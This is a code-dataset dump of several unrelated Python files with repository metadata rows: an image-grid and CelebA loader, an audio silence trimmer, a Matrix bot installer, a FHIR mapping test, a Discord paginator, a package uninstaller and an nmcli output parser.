"""Tile a batch of images into one (size[0] x size[1]) grid, rescaling from x_range."""
h, w = images.shape[1], images.shape[2]
img = np.zeros((np.int64(h * size[0]), np.int64(w * size[1]), 3) , dtype = np.float32)
for idx, image in enumerate(images):
i = idx % size[1]
j = idx // size[1]
img[j * h:j * h + h, i * w: i * w + w, :] = (image/(x_range[1] - x_range[0])) + np.abs(x_range[0])/2.0
return img
def inverse_transform(image):
return (image * 255.0).astype(np.uint8)
class CelebA(object):
def __init__(self, images_path):
self.dataname = "CelebA"
self.dims = 64 * 64
self.shape = [64, 64, 3]
self.image_size = 64
self.channel = 3
self.images_path = images_path
self.train_data_list, self.val_data_list, self.test_data_list = self.read_image_list_file(images_path)
def load_celebA(self):
# get the list of image path
return self.train_data_list
def load_test_celebA(self):
# get the list of image path
return self.val_data_list
def read_image_list_file(self, category):
lines = open(category + "list_eval_partition.txt")
train_list = []
val_list = []
test_list = []
for line in lines:
name , tag = line.split(' ')
name = category + 'celebA/' + name
if tag[0] == '0':
train_list += [name]
elif tag[0] == '1':
val_list += [name]
else:
test_list += [name]
return train_list, val_list, test_list | 32.292857 | 110 | 0.614245 | 700 | 4,521 | 3.79 | 0.242857 | 0.029024 | 0.01357 | 0.015831 | 0.16585 | 0.16585 | 0.134188 | 0.08594 | 0.08594 | 0.059555 | 0 | 0.024644 | 0.255032 | 4,521 | 140 | 111 | 32.292857 | 0.763064 | 0.023004 | 0 | 0.053097 | 0 | 0 | 0.014279 | 0.005213 | 0 | 0 | 0 | 0 | 0 | 1 | 0.141593 | false | 0.00885 | 0.106195 | 0.044248 | 0.380531 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0c132089f9bf26af19d1900865d4951821d8c47f | 1,830 | py | Python | project_src/reduce.py | ncble/Speech-Recognition | a00190cb1bf6e37f883ccbbf36eb27d05ac169ca | [
"Apache-2.0"
] | 4 | 2018-02-09T07:51:19.000Z | 2020-06-16T10:16:06.000Z | project_src/reduce.py | ncble/Speech-Recognition | a00190cb1bf6e37f883ccbbf36eb27d05ac169ca | [
"Apache-2.0"
] | null | null | null | project_src/reduce.py | ncble/Speech-Recognition | a00190cb1bf6e37f883ccbbf36eb27d05ac169ca | [
"Apache-2.0"
] | null | null | null | from utile import *
import librosa
import os
import time
import numpy as np
'''
Cut silence in data -> inefficient because size_after > size_before...
'''
def reduce_audio_file(filename, new_path):
'''
Open a file, remove silence and save it to another location:
- filename: path to the file
- new_path: path to new file
'''
y, sr = librosa.load(filename, sr=22050)
y = librosa.effects.trim(y, top_db=15)[0]
librosa.output.write_wav(new_path, y, sr)
def reduce_all(folder, new_folder, max_iter = 100):
'''
Remove silence from all the file and save them to another location:
- folder: path to the folder containing the files
- new_folder: path to the new folder to save the files
- max_iter: max number of files to reduce
'''
g = generator(root_dir=folder)
new_folder_split = new_folder.split("/")
i = 0
for filename in g:
file_split = filename.split("/")
if file_split[-1][-3:] == "wav": # check that the file is a ".wav"
new_path = new_folder +"/"+ "/".join(file_split[len(new_folder_split):-1])
if not os.path.exists(new_path):
os.makedirs(new_path)
reduce_audio_file(filename, os.path.join(new_path, file_split[-1]))
i += 1
if i > max_iter:
return
if __name__ == '__main__':
print("Start test data")
if not os.path.exists('../data_reduced/train/audio'):
os.makedirs('../data_reduced/train/audio')
reduce_all('../data/train/audio/', '../data_reduced/train/audio', max_iter = np.infty)
print("Start test data")
if not os.path.exists('../data_reduced/test/audio'):
os.makedirs('../data_reduced/test/audio')
reduce_all('../data/test/audio/', '../data_reduced/test/audio', max_iter = np.infty)
| 34.528302 | 90 | 0.631694 | 267 | 1,830 | 4.142322 | 0.318352 | 0.044304 | 0.024412 | 0.029837 | 0.179928 | 0.083183 | 0.083183 | 0.083183 | 0.083183 | 0.083183 | 0 | 0.012126 | 0.23388 | 1,830 | 52 | 91 | 35.192308 | 0.776748 | 0.210929 | 0 | 0.0625 | 0 | 0 | 0.184791 | 0.120913 | 0 | 0 | 0 | 0 | 0 | 1 | 0.0625 | false | 0 | 0.15625 | 0 | 0.25 | 0.0625 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0c141b3124b4ae6f2fe0a680e11df1f0f1a00584 | 2,742 | py | Python | modules/apps/PrefabSynapsebot.py | Jumpscale/rsal9 | e7ff7638ca53dafe872ce3030a379e8b65cb4831 | [
"Apache-2.0"
] | 1 | 2017-06-07T08:11:57.000Z | 2017-06-07T08:11:57.000Z | modules/apps/PrefabSynapsebot.py | Jumpscale/rsal9 | e7ff7638ca53dafe872ce3030a379e8b65cb4831 | [
"Apache-2.0"
] | 106 | 2017-05-10T18:16:31.000Z | 2019-09-18T15:09:07.000Z | modules/apps/PrefabSynapsebot.py | Jumpscale/rsal9 | e7ff7638ca53dafe872ce3030a379e8b65cb4831 | [
"Apache-2.0"
] | 5 | 2018-01-26T16:11:52.000Z | 2018-08-22T15:12:52.000Z | from js9 import j
app = j.tools.prefab._getBaseAppClass()
class PrefabSynapsebot(app):
NAME = "synapse-bot"
def _init(self):
self.bot_repo = "https://github.com/arahmanhamdy/Matrix-NEB.git"
self.server_path = "{{CODEDIR}}/matrixbot"
def build(self, reset=False):
if self.doneCheck('build', reset):
return
# Install prerequisite libraries
self.prefab.system.package.mdupdate()
needed_packages = ["python3-pip", "python3-setuptools"]
for package in needed_packages:
self.prefab.system.package.ensure(package)
# Clone bot server repo
self.prefab.tools.git.pullRepo(self.bot_repo, dest=self.server_path)
# Install prerequisite python libs
cmd = """
cd {server_path}
python3 setup.py install
""".format(server_path=self.server_path)
self.prefab.core.run(cmd)
self.doneSet('build')
def install(self, matrix_url, bot_user, admins=None, start=True, reset=False):
"""
Build and Install synapse matrix bot server
:param matrix_url: Synapse matrix url
:param bot_user: the full username of bot user (i.e @gigbot:matrix.aydo.com)
:param admins:list: list of full username of admins of the bot (i.e ["@root:matrix.aydo.com"])
:param start: start after install
:param reset: reset building
"""
self.build(reset=reset)
# Configure synapse bot server
self._configure(matrix_url, bot_user, admins)
if start:
self.start()
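# Usage sketch (`prefab.apps.synapsebot` is a hypothetical accessor path; the
# usernames follow the docstring's examples):
#   prefab.apps.synapsebot.install("https://matrix.aydo.com",
#                                  "@gigbot:matrix.aydo.com",
#                                  admins=["@root:matrix.aydo.com"])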
def _configure(self, matrix_url, bot_user, admins=None):
import requests
if not admins:
admins = []
# create bot user
bot = {"username": bot_user, "password": "", "auth": {"type": "m.login.dummy"}}
res = requests.post("{}/_matrix/client/r0/register".format(matrix_url), json=bot)
token = res.json()['access_token']
# configure bot server to use the bot user
config_file_path = "{}/botserver.conf".format(self.server_path)
config_data = {
"url": matrix_url,
"case_insensitive": True,
"token": token,
"admins": admins,
"user": bot_user
}
config_data = j.data.serializer.json.dumps(config_data)
self.prefab.core.file_write(config_file_path, config_data)
def start(self):
cmd = 'python3 "{}" -c "{}"'.format(self.server_path + "/neb.py", self.server_path + "/botserver.conf")
self.prefab.system.processmanager.get().ensure("matrix-bot", cmd, wait=5, expect="Running on")
def stop(self):
self.prefab.system.processmanager.get().stop("matrix-bot")
| 34.708861 | 111 | 0.615609 | 336 | 2,742 | 4.904762 | 0.357143 | 0.038228 | 0.050971 | 0.029126 | 0.089806 | 0.036408 | 0.036408 | 0 | 0 | 0 | 0 | 0.003445 | 0.258935 | 2,742 | 78 | 112 | 35.153846 | 0.807579 | 0.178337 | 0 | 0 | 0 | 0 | 0.176282 | 0.022894 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0.020833 | 0.041667 | 0 | 0.229167 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0c1588657944b22234ccd349fa370b26fcdaee8c | 1,331 | py | Python | tests/test_fhir_to_capacity.py | FAIR-data-for-CAPACITY/CAPACITY-mapping | a1b68a228c470f20185b8be781d67fcd5579ccd7 | [
"Apache-2.0"
] | null | null | null | tests/test_fhir_to_capacity.py | FAIR-data-for-CAPACITY/CAPACITY-mapping | a1b68a228c470f20185b8be781d67fcd5579ccd7 | [
"Apache-2.0"
] | 16 | 2021-05-19T07:10:21.000Z | 2021-05-27T12:37:04.000Z | tests/test_fhir_to_capacity.py | FAIR-data-for-CAPACITY/FHIR-to-CAPACITY | a1b68a228c470f20185b8be781d67fcd5579ccd7 | [
"Apache-2.0"
] | null | null | null | from datetime import date
from fhirclient.models.encounter import Encounter
from fhirclient.models.fhirdate import FHIRDate
from fhirclient.models.patient import Patient
from fhirclient.models.period import Period
from fhirtocapacity import mapping
def test_map_patient():
patient = Patient()
patient.gender = 'male'
patient.id = '123'
patient.birthDate = FHIRDate()
patient.birthDate.date = date(1990, 1, 2)
encounter = Encounter()
encounter.period = Period()
encounter.period.start = FHIRDate()
encounter.period.start.date = date(2021, 4, 20)
encounter.period.end = FHIRDate()
encounter.period.end.date = date(2021, 5, 20)
mapped_records = mapping.map_patient(patient, encounters=[encounter])
baseline_capacity = mapped_records[0]
discharge_capacity = mapped_records[1]
assert baseline_capacity['sex'] == 1
assert baseline_capacity['subjid'] == '123'
assert baseline_capacity['age_estimateyears'] == 31
assert baseline_capacity['age_estimateyearsu'] == 2
assert baseline_capacity['admission_date'] == '2021-04-20'
assert baseline_capacity['admission_any_date'] == '2021-04-20'
assert discharge_capacity['subjid'] == '123'
assert discharge_capacity['capdis_outcomedate'] == '2021-05-20'
assert discharge_capacity['capdis_date']
| 32.463415 | 73 | 0.730278 | 158 | 1,331 | 6 | 0.310127 | 0.118143 | 0.139241 | 0.048523 | 0.037975 | 0 | 0 | 0 | 0 | 0 | 0 | 0.052679 | 0.158527 | 1,331 | 40 | 74 | 33.275 | 0.79375 | 0 | 0 | 0 | 0 | 0 | 0.115702 | 0 | 0 | 0 | 0 | 0 | 0.3 | 1 | 0.033333 | false | 0 | 0.2 | 0 | 0.233333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0c16b47612e50cf993e4a0d9f619541dd218324d | 18,120 | py | Python | sebimachine/shared_libs/paginator.py | dustinpianalto/Sebi-Machine | 946590a3a14461ff73fee015feb183a1d3361f14 | [
"MIT"
] | 8 | 2018-05-24T11:10:26.000Z | 2020-12-11T19:21:52.000Z | sebimachine/shared_libs/paginator.py | dustinpianalto/Sebi-Machine | 946590a3a14461ff73fee015feb183a1d3361f14 | [
"MIT"
] | 16 | 2018-05-24T01:02:26.000Z | 2018-06-21T18:43:51.000Z | sebimachine/shared_libs/paginator.py | dustinpianalto/Sebi-Machine | 946590a3a14461ff73fee015feb183a1d3361f14 | [
"MIT"
] | 15 | 2018-05-24T07:40:53.000Z | 2018-06-20T16:38:43.000Z | """
Utility for creating Paginated responses
#####################################################################################
# #
# MIT License #
# #
# Copyright (c) 2018 Dusty.P https://github.com/dustinpianalto #
# #
# Permission is hereby granted, free of charge, to any person obtaining a copy #
# of this software and associated documentation files (the "Software"), to deal #
# in the Software without restriction, including without limitation the rights #
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell #
# copies of the Software, and to permit persons to whom the Software is #
# furnished to do so, subject to the following conditions: #
# #
# The above copyright notice and this permission notice shall be included in all #
# copies or substantial portions of the Software. #
# #
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR #
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, #
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE #
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER #
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, #
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE #
# SOFTWARE. #
# #
#####################################################################################
"""
import asyncio
import typing
import discord
class Paginator:
def __init__(
self,
bot: discord.ext.commands.Bot,
*,
max_chars: int = 1970,
max_lines: int = 20,
prefix: str = "```md",
suffix: str = "```",
page_break: str = "\uFFF8",
field_break: str = "\uFFF7",
field_name_char: str = "\uFFF6",
inline_char: str = "\uFFF5",
max_line_length: int = 100,
embed=False,
):
_max_len = 6000 if embed else 1980
assert 0 < max_lines <= max_chars
assert 0 < max_line_length < 120
self._parts = list()
self._prefix = prefix
self._suffix = suffix
self._max_chars = (
max_chars
if max_chars + len(prefix) + len(suffix) + 2 <= _max_len
else _max_len - len(prefix) - len(suffix) - 2
)
self._max_lines = max_lines - (prefix + suffix).count("\n") + 1
self._page_break = page_break
self._max_line_length = max_line_length
self._pages = list()
self._max_field_chars = 1014
self._max_field_name = 256
self._max_description = 2048
self._embed = embed
self._field_break = field_break
self._field_name_char = field_name_char
self._inline_char = inline_char
self._embed_title = ""
self._embed_description = ""
self._embed_color = None
self._embed_thumbnail = None
self._embed_url = None
self._bot = bot
def set_embed_meta(
self,
title: str = None,
description: str = None,
color: discord.Colour = None,
thumbnail: str = None,
url: str = None,
):
if title and len(title) > self._max_field_name:
raise RuntimeError("Provided Title is too long")
else:
self._embed_title = title
if description and len(description) > self._max_description:
raise RuntimeError("Provided Description is too long")
else:
self._embed_description = description
self._embed_color = color
self._embed_thumbnail = thumbnail
self._embed_url = url
def pages(self) -> typing.List[str]:
_pages = list()
_fields = list()
_page = ""
_lines = 0
_field_name = ""
_field_value = ""
_inline = False
def open_page():
nonlocal _page, _lines, _fields
if not self._embed:
_page = self._prefix
_lines = 0
else:
_fields = list()
def close_page():
nonlocal _page, _lines, _fields
if not self._embed:
_page += self._suffix
_pages.append(_page)
else:
if _fields:
_pages.append(_fields)
open_page()
open_page()
if not self._embed:
for part in [str(p) for p in self._parts]:
                if part == self._page_break:
                    close_page()
                    continue
                new_chars = len(_page) + len(part)
                if new_chars > self._max_chars:
                    close_page()
                elif (_lines + part.count("\n") + 1) > self._max_lines:
                    close_page()
                _lines += part.count("\n") + 1
                _page += "\n" + part
else:
def open_field(name: str):
nonlocal _field_value, _field_name
_field_name = name
_field_value = self._prefix
def close_field(next_name: str = None):
nonlocal _field_name, _field_value, _fields
_field_value += self._suffix
if _field_value != self._prefix + self._suffix:
_fields.append(
{"name": _field_name, "value": _field_value, "inline": _inline}
)
if next_name:
open_field(next_name)
open_field("\uFFF0")
for part in [str(p) for p in self._parts]:
if part == self._page_break:
close_page()
continue
elif part == self._field_break:
if len(_fields) + 1 < 25:
close_field(next_name="\uFFF0")
else:
close_field()
close_page()
continue
if part.startswith(self._field_name_char):
part = part.replace(self._field_name_char, "")
if part.startswith(self._inline_char):
_inline = True
part = part.replace(self._inline_char, "")
else:
_inline = False
if _field_value and _field_value != self._prefix:
close_field(part)
else:
_field_name = part
continue
_field_value += "\n" + part
close_field()
close_page()
self._pages = _pages
return _pages
def process_pages(self) -> typing.List[str]:
_pages = self._pages or self.pages()
_len_pages = len(_pages)
_len_page_str = len(f"{_len_pages}/{_len_pages}")
if not self._embed:
for i, page in enumerate(_pages):
if len(page) + _len_page_str <= 2000:
_pages[i] = f"{i + 1}/{_len_pages}\n{page}"
else:
for i, page in enumerate(_pages):
em = discord.Embed(
title=self._embed_title,
description=self._embed_description,
color=self._bot.embed_color,
)
if self._embed_thumbnail:
em.set_thumbnail(url=self._embed_thumbnail)
if self._embed_url:
em.url = self._embed_url
if self._embed_color:
em.colour = self._embed_color
em.set_footer(text=f"{i + 1}/{_len_pages}")
for field in page:
em.add_field(
name=field["name"], value=field["value"], inline=field["inline"]
)
_pages[i] = em
return _pages
def __len__(self):
return sum(len(p) for p in self._parts)
def __eq__(self, other):
# noinspection PyProtectedMember
return self.__class__ == other.__class__ and self._parts == other._parts
def add_page_break(self, *, to_beginning: bool = False) -> None:
self.add(self._page_break, to_beginning=to_beginning)
def add(
self,
item: typing.Any,
*,
to_beginning: bool = False,
keep_intact: bool = False,
truncate=False,
) -> None:
item = str(item)
i = 0
if not keep_intact and not item == self._page_break:
item_parts = item.strip("\n").split("\n")
for part in item_parts:
if len(part) > self._max_line_length:
if not truncate:
length = 0
out_str = ""
def close_line(line):
nonlocal i, out_str, length
self._parts.insert(
i, out_str
) if to_beginning else self._parts.append(out_str)
i += 1
out_str = line + " "
length = len(out_str)
bits = part.split(" ")
for bit in bits:
next_len = length + len(bit) + 1
if next_len <= self._max_line_length:
out_str += bit + " "
length = next_len
elif len(bit) > self._max_line_length:
if out_str:
close_line(line="")
for out_str in [
bit[i : i + self._max_line_length]
for i in range(0, len(bit), self._max_line_length)
]:
close_line("")
else:
close_line(bit)
close_line("")
else:
line = f"{part:.{self._max_line_length-3}}..."
self._parts.insert(
i, line
) if to_beginning else self._parts.append(line)
else:
self._parts.insert(i, part) if to_beginning else self._parts.append(
part
)
i += 1
elif keep_intact and not item == self._page_break:
if len(item) >= self._max_chars or item.count("\n") > self._max_lines:
                raise RuntimeError(
                    f"{item} is too long to keep on a single page and is marked to keep intact."
                )
if to_beginning:
self._parts.insert(0, item)
else:
self._parts.append(item)
else:
if to_beginning:
self._parts.insert(0, item)
else:
self._parts.append(item)
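# A short usage sketch (assumes an existing discord.ext.commands.Bot named
# `bot`; illustrative, not part of the original module):
# pag = Paginator(bot, max_lines=15)
# pag.add("first block of text")
# pag.add_page_break()
# pag.add("this lands on page two")
# pages = pag.process_pages()  # list of ready-to-send strings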
class Book:
def __init__(
self,
pag: Paginator,
ctx: typing.Tuple[
typing.Optional[discord.Message],
discord.TextChannel,
discord.ext.commands.Bot,
discord.Message,
],
) -> None:
self._pages = pag.process_pages()
self._len_pages = len(self._pages)
self._current_page = 0
self._message, self._channel, self._bot, self._calling_message = ctx
self._locked = True
if pag == Paginator(self._bot):
raise RuntimeError("Cannot create a book out of an empty Paginator.")
def advance_page(self) -> None:
self._current_page += 1
if self._current_page >= self._len_pages:
self._current_page = 0
def reverse_page(self) -> None:
self._current_page += -1
if self._current_page < 0:
self._current_page = self._len_pages - 1
async def display_page(self) -> None:
if isinstance(self._pages[self._current_page], discord.Embed):
if self._message:
await self._message.edit(
content=None, embed=self._pages[self._current_page]
)
else:
self._message = await self._channel.send(
embed=self._pages[self._current_page]
)
else:
if self._message:
await self._message.edit(
content=self._pages[self._current_page], embed=None
)
else:
self._message = await self._channel.send(
self._pages[self._current_page]
)
async def create_book(self) -> None:
# noinspection PyUnresolvedReferences
async def reaction_checker():
# noinspection PyShadowingNames
def check(reaction, user):
if self._locked:
return (
str(reaction.emoji) in self._bot.book_emojis.values()
and user == self._calling_message.author
and reaction.message.id == self._message.id
)
else:
return (
str(reaction.emoji) in self._bot.book_emojis.values()
and reaction.message.id == self._message.id
)
await self.display_page()
if len(self._pages) > 1:
for emoji in self._bot.book_emojis.values():
try:
await self._message.add_reaction(emoji)
except (discord.Forbidden, KeyError):
pass
else:
try:
await self._message.add_reaction(self._bot.book_emojis["unlock"])
await self._message.add_reaction(self._bot.book_emojis["close"])
except (discord.Forbidden, KeyError):
pass
while True:
try:
reaction, user = await self._bot.wait_for(
"reaction_add", timeout=60, check=check
)
except asyncio.TimeoutError:
try:
await self._message.clear_reactions()
except discord.Forbidden:
pass
raise asyncio.CancelledError
else:
await self._message.remove_reaction(reaction, user)
if str(reaction.emoji) == self._bot.book_emojis["close"]:
await self._calling_message.delete()
await self._message.delete()
raise asyncio.CancelledError
elif str(reaction.emoji) == self._bot.book_emojis["forward"]:
self.advance_page()
elif str(reaction.emoji) == self._bot.book_emojis["back"]:
self.reverse_page()
elif str(reaction.emoji) == self._bot.book_emojis["end"]:
self._current_page = self._len_pages - 1
elif str(reaction.emoji) == self._bot.book_emojis["start"]:
self._current_page = 0
elif str(reaction.emoji) == self._bot.book_emojis["hash"]:
m = await self._channel.send(
f"Please enter a number in range 1 to {self._len_pages}"
)
def num_check(message):
if self._locked:
return (
message.content.isdigit()
and 0 < int(message.content) <= self._len_pages
and message.author == self._calling_message.author
)
else:
return (
message.content.isdigit()
and 0 < int(message.content) <= self._len_pages
)
try:
msg = await self._bot.wait_for(
"message", timeout=30, check=num_check
)
except asyncio.TimeoutError:
await m.edit(content="Message Timed out.")
else:
self._current_page = int(msg.content) - 1
try:
await m.delete()
await msg.delete()
except discord.Forbidden:
pass
elif str(reaction.emoji) == self._bot.book_emojis["unlock"]:
self._locked = False
await self._message.remove_reaction(
reaction, self._channel.guild.me
)
continue
await self.display_page()
self._bot.loop.create_task(reaction_checker())
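# Usage sketch (inside a bot command; `ctx` is a commands.Context and is
# illustrative): build a Paginator, then hand Book the
# (message, channel, bot, calling_message) tuple it expects:
# pag = Paginator(bot)
# pag.add("page one")
# book = Book(pag, (None, ctx.channel, bot, ctx.message))
# await book.create_book()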
| 39.824176 | 95 | 0.457174 | 1,719 | 18,120 | 4.534613 | 0.166958 | 0.026555 | 0.028865 | 0.026171 | 0.297755 | 0.249006 | 0.206799 | 0.140603 | 0.102886 | 0.081078 | 0 | 0.008815 | 0.455353 | 18,120 | 454 | 96 | 39.911894 | 0.781032 | 0.126325 | 0 | 0.332454 | 0 | 0 | 0.032554 | 0.00531 | 0 | 0 | 0 | 0 | 0.005277 | 1 | 0.047493 | false | 0.010554 | 0.007916 | 0.005277 | 0.081794 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0c19824dda603b18281a6a9aa063606c5a892029 | 4,443 | py | Python | msl/package_manager/uninstall.py | MSLNZ/msl-package-manager | 19d3e8624d4408c37d48c195a440cd2714d4765d | [
"MIT"
] | 3 | 2019-01-14T07:51:30.000Z | 2022-02-16T22:32:42.000Z | msl/package_manager/uninstall.py | MSLNZ/msl-package-manager | 19d3e8624d4408c37d48c195a440cd2714d4765d | [
"MIT"
] | 8 | 2018-06-01T22:00:52.000Z | 2021-10-18T00:59:00.000Z | msl/package_manager/uninstall.py | MSLNZ/msl-package-manager | 19d3e8624d4408c37d48c195a440cd2714d4765d | [
"MIT"
] | null | null | null | """
Uninstall MSL packages.
"""
import os
import sys
import subprocess
import pkg_resources
from . import utils
def uninstall(*names, **kwargs):
"""Uninstall MSL packages.
.. versionchanged:: 2.4.0
Added the `pip_options` keyword argument.
Parameters
----------
*names
The name(s) of the MSL package(s) to uninstall. If not specified then
uninstall all MSL packages (except for the **MSL Package Manager** --
in which case use ``pip uninstall msl-package-manager``). The
``msl-`` prefix can be omitted (e.g., ``'loadlib'`` is equivalent to
``'msl-loadlib'``). Also accepts shell-style wildcards (e.g., ``'pr-*'``).
**kwargs
* yes -- :class:`bool`
If :data:`True` then don't ask for confirmation before uninstalling.
The default is :data:`False` (ask before uninstalling).
* pip_options -- :class:`list` of :class:`str`
Optional arguments to pass to the ``pip uninstall`` command,
e.g., ``['--no-python-version-warning']``
"""
# TODO Python 2.7 does not support named arguments after using *args
# we can define yes=False, pip_options=None in the function signature
# when we choose to drop support for Python 2.7
utils._check_kwargs(kwargs, {'yes', 'pip_options'})
yes = kwargs.get('yes', False)
pip_options = kwargs.get('pip_options', [])
packages = utils._create_uninstall_list(names)
if not packages:
utils.log.info('No MSL packages to uninstall')
return
# use the word REMOVE since it visibly looks different than UNINSTALL and INSTALL do
utils._log_install_uninstall_message(packages, 'REMOVED')
if not (yes or utils._ask_proceed()):
return
# After a MSL package gets uninstalled the "msl" namespace gets destroyed.
# This is a known issue:
# https://github.com/pypa/sample-namespace-packages/issues/5
# https://github.com/pypa/python-packaging-user-guide/issues/314
    # There are a few ways to bypass this issue:
# 1. force all MSL packages to require that the MSL Package Manager is installed
# and only the MSL Package Manager contains the namespace __init__.py file
# 2. modify the setup.py of each namespace package to have "packages=" include
# only the child package.
# 3. what is done below... assume that MSL packages are uninstalled using the
# MSL Package Manager and then re-create the __init__.py files after a
# package is uninstalled.
def check_if_namespace_package(package_name):
for dist in pkg_resources.working_set:
if dist.project_name in package_name:
split = package_name.split('-')
if len(split) != 2:
break
examples_init_file = os.path.join(dist.module_path, split[0], 'examples', '__init__.py')
if not os.path.isfile(examples_init_file):
break
with open(examples_init_file, 'rt') as fp:
examples_init = fp.readlines()
init_file = os.path.join(dist.module_path, split[0], '__init__.py')
if not os.path.isfile(init_file):
break
with open(init_file, 'rt') as fp:
init = fp.readlines()
for line in init:
if '__path__' in line and 'pkgutil' in line:
return True, os.path.dirname(init_file), init, examples_init
return False, None, None, None
utils.log.info('')
exe = [sys.executable, '-m', 'pip', 'uninstall']
    if '--quiet' not in pip_options and '-q' not in pip_options:
pip_options.extend(['--quiet'] * utils._pip_quiet)
if '--disable-pip-version-check' not in pip_options:
pip_options.append('--disable-pip-version-check')
    if '--yes' not in pip_options and '-y' not in pip_options:
pip_options.append('--yes')
for pkg in packages:
is_namespace, path, init, examples_init = check_if_namespace_package(pkg)
subprocess.call(exe + pip_options + [pkg])
if is_namespace and os.path.isdir(path):
with open(os.path.join(path, '__init__.py'), 'wt') as fp:
fp.writelines(init)
with open(os.path.join(path, 'examples', '__init__.py'), 'wt') as fp:
fp.writelines(examples_init)
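# Example invocation (a sketch; the package names are illustrative and the
# pip option comes from the docstring above):
# from msl.package_manager import uninstall
# uninstall.uninstall('loadlib', 'qt', yes=True,
#                     pip_options=['--no-python-version-warning'])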
| 39.669643 | 104 | 0.618051 | 589 | 4,443 | 4.514431 | 0.336163 | 0.056412 | 0.024445 | 0.028206 | 0.152313 | 0.1132 | 0.087251 | 0.028582 | 0.028582 | 0.028582 | 0 | 0.005255 | 0.271888 | 4,443 | 111 | 105 | 40.027027 | 0.816692 | 0.414135 | 0 | 0.096154 | 0 | 0 | 0.097161 | 0.021591 | 0 | 0 | 0 | 0.009009 | 0 | 1 | 0.038462 | false | 0 | 0.096154 | 0 | 0.211538 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0c1b3346f3b0af3058f0a464cf6e67fa27a93bce | 966 | py | Python | pynmcli/utils.py | kribeku/PyNmcli | fccd6f1e07ab9a95c3444b23cee4c511ec46d100 | [
"MIT"
] | 6 | 2018-06-01T13:17:07.000Z | 2021-01-26T00:52:11.000Z | pynmcli/utils.py | kribeku/PyNmcli | fccd6f1e07ab9a95c3444b23cee4c511ec46d100 | [
"MIT"
] | 1 | 2018-12-12T19:11:19.000Z | 2018-12-12T19:11:19.000Z | pynmcli/utils.py | kribeku/PyNmcli | fccd6f1e07ab9a95c3444b23cee4c511ec46d100 | [
"MIT"
] | 8 | 2018-01-06T09:23:34.000Z | 2022-03-28T13:41:09.000Z | import re
def get_header(table):
header_line = table.split('\n')[0]
regex_word = r'[a-zA-Z0-9_-]+'
headers = []
header_matches = re.finditer(regex_word, header_line)
for header in header_matches:
headers.append({
'title': header.group(),
'start': header.start()
})
return headers
def get_data(table):
headers = get_header(table)
lines = table.split('\n')
data = []
for i in range(1, len(lines)):
di = dict()
line = lines[i]
if line == '':
continue
for h in range(0, len(headers)):
header = headers[h]['title']
start_index = headers[h]['start']
if h >= len(headers) - 1:
di[header] = line[start_index:].strip()
else:
end_index = headers[h + 1]['start']
di[header] = line[start_index:end_index].strip()
data.append(di)
return data
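if __name__ == '__main__':
    # Small self-contained demonstration; the table below is made up to
    # mimic `nmcli device` output and is not real command output.
    sample = ("DEVICE  TYPE      STATE\n"
              "eth0    ethernet  connected\n"
              "wlan0   wifi      disconnected\n")
    print(get_data(sample))
    # -> [{'DEVICE': 'eth0', 'TYPE': 'ethernet', 'STATE': 'connected'},
    #     {'DEVICE': 'wlan0', 'TYPE': 'wifi', 'STATE': 'disconnected'}]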
| 26.108108 | 64 | 0.520704 | 118 | 966 | 4.135593 | 0.355932 | 0.081967 | 0.057377 | 0.069672 | 0.090164 | 0 | 0 | 0 | 0 | 0 | 0 | 0.01092 | 0.336439 | 966 | 36 | 65 | 26.833333 | 0.75039 | 0 | 0 | 0 | 0 | 0 | 0.044513 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.064516 | false | 0 | 0.032258 | 0 | 0.16129 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
